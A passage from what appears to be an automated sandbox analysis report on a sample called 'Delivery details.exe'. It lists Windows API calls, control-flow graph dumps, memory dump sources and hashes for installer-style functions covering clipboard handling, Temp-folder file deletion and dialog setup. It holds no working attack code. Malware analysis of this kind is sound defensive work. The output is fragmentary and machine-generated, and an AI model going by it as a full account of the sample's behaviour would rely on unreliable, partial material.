                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                  • CreatePopupMenu.USER32 ref: 004057E0
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                  • GetWindowRect.USER32(?,?), ref: 00405814
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                  • OpenClipboard.USER32(00000000), ref: 00405875
                                                                  • EmptyClipboard.USER32 ref: 0040587B
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                  • CloseClipboard.USER32 ref: 004058D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                  • String ID: (7B${
                                                                  • API String ID: 4154960007-525222780
                                                                  • Opcode ID: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
                                                                  • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                  • Opcode Fuzzy Hash: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
                                                                  • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 503 405abe-405ae4 call 405d89 506 405ae6-405af8 DeleteFileW 503->506 507 405afd-405b04 503->507 508 405c7a-405c7e 506->508 509 405b06-405b08 507->509 510 405b17-405b27 call 4063b0 507->510 511 405c28-405c2d 509->511 512 405b0e-405b11 509->512 516 405b36-405b37 call 405ccd 510->516 517 405b29-405b34 lstrcatW 510->517 511->508 515 405c2f-405c32 511->515 512->510 512->511 518 405c34-405c3a 515->518 519 405c3c-405c44 call 4066f3 515->519 520 405b3c-405b40 516->520 517->520 518->508 519->508 527 405c46-405c5a call 405c81 call 405a76 519->527 523 405b42-405b4a 520->523 524 405b4c-405b52 lstrcatW 520->524 523->524 526 405b57-405b73 lstrlenW FindFirstFileW 523->526 524->526 528 405b79-405b81 526->528 529 405c1d-405c21 526->529 543 405c72-405c75 call 405414 527->543 544 405c5c-405c5f 527->544 532 405ba1-405bb5 call 4063b0 528->532 533 405b83-405b8b 528->533 529->511 531 405c23 529->531 531->511 545 405bb7-405bbf 532->545 546 405bcc-405bd7 call 405a76 532->546 535 405c00-405c10 FindNextFileW 533->535 536 405b8d-405b95 533->536 535->528 539 405c16-405c17 FindClose 535->539 536->532 540 405b97-405b9f 536->540 539->529 540->532 540->535 543->508 544->518 550 405c61-405c70 call 405414 call 406176 544->550 545->535 547 405bc1-405bca call 405abe 545->547 556 405bf8-405bfb call 405414 546->556 557 405bd9-405bdc 546->557 547->535 550->508 556->535 559 405bf0-405bf6 557->559 560 405bde-405bee call 405414 call 406176 557->560 559->535 560->535
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405AE7
                                                                  • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B2F
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B58
                                                                  • FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B68
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                  • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\Delivery details.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-1271053702
                                                                  • Opcode ID: a369ea2e0404f4c3a3198dd56cf7874cc68d0a45c7fc7fbaad5b82e9195f06ae
                                                                  • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                  • Opcode Fuzzy Hash: a369ea2e0404f4c3a3198dd56cf7874cc68d0a45c7fc7fbaad5b82e9195f06ae
                                                                  • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 710 406aba-406abf 711 406b30-406b4e 710->711 712 406ac1-406af0 710->712 713 407126-40713b 711->713 714 406af2-406af5 712->714 715 406af7-406afb 712->715 716 407155-40716b 713->716 717 40713d-407153 713->717 718 406b07-406b0a 714->718 719 406b03 715->719 720 406afd-406b01 715->720 723 40716e-407175 716->723 717->723 721 406b28-406b2b 718->721 722 406b0c-406b15 718->722 719->718 720->718 726 406cfd-406d1b 721->726 724 406b17 722->724 725 406b1a-406b26 722->725 727 407177-40717b 723->727 728 40719c-4071a8 723->728 724->725 730 406b90-406bbe 725->730 731 406d33-406d45 726->731 732 406d1d-406d31 726->732 733 407181-407199 727->733 734 40732a-407334 727->734 736 40693e-406947 728->736 737 406bc0-406bd8 730->737 738 406bda-406bf4 730->738 735 406d48-406d52 731->735 732->735 733->728 739 407340-407353 734->739 740 406d54 735->740 741 406cf5-406cfb 735->741 742 407355 736->742 743 40694d 736->743 744 406bf7-406c01 737->744 738->744 745 407358-40735c 739->745 746 406cd0-406cd4 740->746 747 406e65-406e72 740->747 741->726 752 406c99-406ca3 741->752 742->745 748 406954-406958 743->748 749 406a94-406ab5 743->749 750 4069f9-4069fd 743->750 751 406a69-406a6d 743->751 753 406c07 744->753 754 406b78-406b7e 744->754 763 406cda-406cf2 746->763 764 4072dc-4072e6 746->764 747->736 758 406ec1-406ed0 747->758 748->739 755 40695e-40696b 748->755 749->713 765 406a03-406a1c 750->765 766 4072a9-4072b3 750->766 756 406a73-406a87 751->756 757 4072b8-4072c2 751->757 759 4072e8-4072f2 752->759 760 406ca9-406ccb 752->760 773 4072c4-4072ce 753->773 774 406b5d-406b75 753->774 761 406c31-406c37 754->761 762 406b84-406b8a 754->762 755->742 770 406971-4069b7 755->770 772 406a8a-406a92 756->772 757->739 758->713 759->739 760->747 768 406c95 761->768 769 406c39-406c57 761->769 762->730 762->768 763->741 764->739 771 406a1f-406a23 765->771 766->739 768->752 775 406c59-406c6d 769->775 776 406c6f-406c81 769->776 777 4069b9-4069bd 770->777 778 4069df-4069e1 770->778 771->750 779 406a25-406a2b 771->779 772->749 772->751 773->739 774->754 780 406c84-406c8e 775->780 776->780 781 4069c8-4069d6 GlobalAlloc 777->781 782 4069bf-4069c2 GlobalFree 777->782 783 4069e3-4069ed 778->783 784 4069ef-4069f7 778->784 785 406a55-406a67 779->785 786 406a2d-406a34 779->786 780->761 789 406c90 780->789 781->742 790 4069dc 781->790 782->781 783->783 783->784 784->771 785->772 787 406a36-406a39 GlobalFree 786->787 788 406a3f-406a4f GlobalAlloc 786->788 787->788 788->742 788->785 792 4072d0-4072da 789->792 793 406c16-406c2e 789->793 790->778 792->739 793->761
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                  • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                  • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                  • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 004066FE
                                                                  • FindClose.KERNEL32(00000000), ref: 0040670A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: xgB
                                                                  • API String ID: 2295610775-399326502
                                                                  • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                  • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                  • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                  • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 190 403e6c-403e7e 191 403e84-403e8a 190->191 192 403fbf-403fce 190->192 191->192 193 403e90-403e99 191->193 194 403fd0-404018 GetDlgItem * 2 call 404345 SetClassLongW call 40140b 192->194 195 40401d-404032 192->195 196 403e9b-403ea8 SetWindowPos 193->196 197 403eae-403eb1 193->197 194->195 199 404072-404077 call 404391 195->199 200 404034-404037 195->200 196->197 201 403eb3-403ec5 ShowWindow 197->201 202 403ecb-403ed1 197->202 207 40407c-404097 199->207 204 404039-404044 call 401389 200->204 205 40406a-40406c 200->205 201->202 208 403ed3-403ee8 DestroyWindow 202->208 209 403eed-403ef0 202->209 204->205 227 404046-404065 SendMessageW 204->227 205->199 212 404312 205->212 213 4040a0-4040a6 207->213 214 404099-40409b call 40140b 207->214 215 4042ef-4042f5 208->215 218 403ef2-403efe SetWindowLongW 209->218 219 403f03-403f09 209->219 217 404314-40431b 212->217 223 4042d0-4042e9 DestroyWindow EndDialog 213->223 224 4040ac-4040b7 213->224 214->213 215->212 222 4042f7-4042fd 215->222 218->217 225 403fac-403fba call 4043ac 219->225 226 403f0f-403f20 GetDlgItem 219->226 222->212 228 4042ff-404308 ShowWindow 222->228 223->215 224->223 229 4040bd-40410a call 4063d2 call 404345 * 3 GetDlgItem 224->229 225->217 230 403f22-403f39 SendMessageW IsWindowEnabled 226->230 231 403f3f-403f42 226->231 227->217 228->212 260 404114-404150 ShowWindow KiUserCallbackDispatcher call 404367 EnableWindow 229->260 261 40410c-404111 229->261 230->212 230->231 235 403f44-403f45 231->235 236 403f47-403f4a 231->236 238 403f75-403f7a call 40431e 235->238 239 403f58-403f5d 236->239 240 403f4c-403f52 236->240 238->225 241 403f93-403fa6 SendMessageW 239->241 242 403f5f-403f65 239->242 240->241 245 403f54-403f56 240->245 241->225 246 403f67-403f6d call 40140b 242->246 247 403f7c-403f85 call 40140b 242->247 245->238 256 403f73 246->256 247->225 257 403f87-403f91 247->257 256->238 257->256 264 404152-404153 260->264 265 404155 260->265 261->260 266 404157-404185 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404187-404198 SendMessageW 266->267 268 40419a 266->268 269 4041a0-4041df call 40437a call 403e4d call 4063b0 lstrlenW call 4063d2 SetWindowTextW call 401389 267->269 268->269 269->207 280 4041e5-4041e7 269->280 280->207 281 4041ed-4041f1 280->281 282 404210-404224 DestroyWindow 281->282 283 4041f3-4041f9 281->283 282->215 285 40422a-404257 CreateDialogParamW 282->285 283->212 284 4041ff-404205 283->284 284->207 286 40420b 284->286 285->215 287 40425d-4042b4 call 404345 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->212 287->212 292 4042b6-4042c9 ShowWindow call 404391 287->292 294 4042ce 292->294 294->215
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                  • ShowWindow.USER32(?), ref: 00403EC5
                                                                  • DestroyWindow.USER32 ref: 00403ED9
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                  • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                  • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                  • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
                                                                  • EnableWindow.USER32(?,?), ref: 00404148
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                  • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                  • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: (7B
                                                                  • API String ID: 3282139019-3251261122
                                                                  • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                  • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                  • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                  • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 295 403abe-403ad6 call 40678a 298 403ad8-403ae8 call 4062f7 295->298 299 403aea-403b21 call 40627e 295->299 307 403b44-403b6d call 403d94 call 405d89 298->307 303 403b23-403b34 call 40627e 299->303 304 403b39-403b3f lstrcatW 299->304 303->304 304->307 313 403b73-403b78 307->313 314 403bff-403c07 call 405d89 307->314 313->314 315 403b7e-403b98 call 40627e 313->315 320 403c15-403c3a LoadImageW 314->320 321 403c09-403c10 call 4063d2 314->321 319 403b9d-403ba6 315->319 319->314 325 403ba8-403bac 319->325 323 403cbb-403cc3 call 40140b 320->323 324 403c3c-403c6c RegisterClassW 320->324 321->320 338 403cc5-403cc8 323->338 339 403ccd-403cd8 call 403d94 323->339 326 403c72-403cb6 SystemParametersInfoW CreateWindowExW 324->326 327 403d8a 324->327 329 403bbe-403bca lstrlenW 325->329 330 403bae-403bbb call 405cae 325->330 326->323 332 403d8c-403d93 327->332 333 403bf2-403bfa call 405c81 call 4063b0 329->333 334 403bcc-403bda lstrcmpiW 329->334 330->329 333->314 334->333 337 403bdc-403be6 GetFileAttributesW 334->337 341 403be8-403bea 337->341 342 403bec-403bed call 405ccd 337->342 338->332 348 403d61-403d62 call 4054e7 339->348 349 403cde-403cf8 ShowWindow call 40671a 339->349 341->333 341->342 342->333 352 403d67-403d69 348->352 356 403d04-403d16 GetClassInfoW 349->356 357 403cfa-403cff call 40671a 349->357 354 403d83-403d85 call 40140b 352->354 355 403d6b-403d71 352->355 354->327 355->338 360 403d77-403d7e call 40140b 355->360 358 403d18-403d28 GetClassInfoW RegisterClassW 356->358 359 403d2e-403d51 DialogBoxParamW call 40140b 356->359 357->356 358->359 365 403d56-403d5f call 403a0e 359->365 360->338 365->332
                                                                  APIs
                                                                    • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                    • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                  • lstrcatW.KERNEL32(1033,00423728), ref: 00403B3F
                                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\akroterion\archmugwump,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\akroterion\archmugwump,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 00403BDD
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\akroterion\archmugwump), ref: 00403C26
                                                                    • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                  • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\Delivery details.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\akroterion\archmugwump$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 1975747703-245174007
                                                                  • Opcode ID: e253c29dc7ae3d3ec2f6130ced45f02b0c74fcfd276267be3fe5b9f48f196543
                                                                  • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                  • Opcode Fuzzy Hash: e253c29dc7ae3d3ec2f6130ced45f02b0c74fcfd276267be3fe5b9f48f196543
                                                                  • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
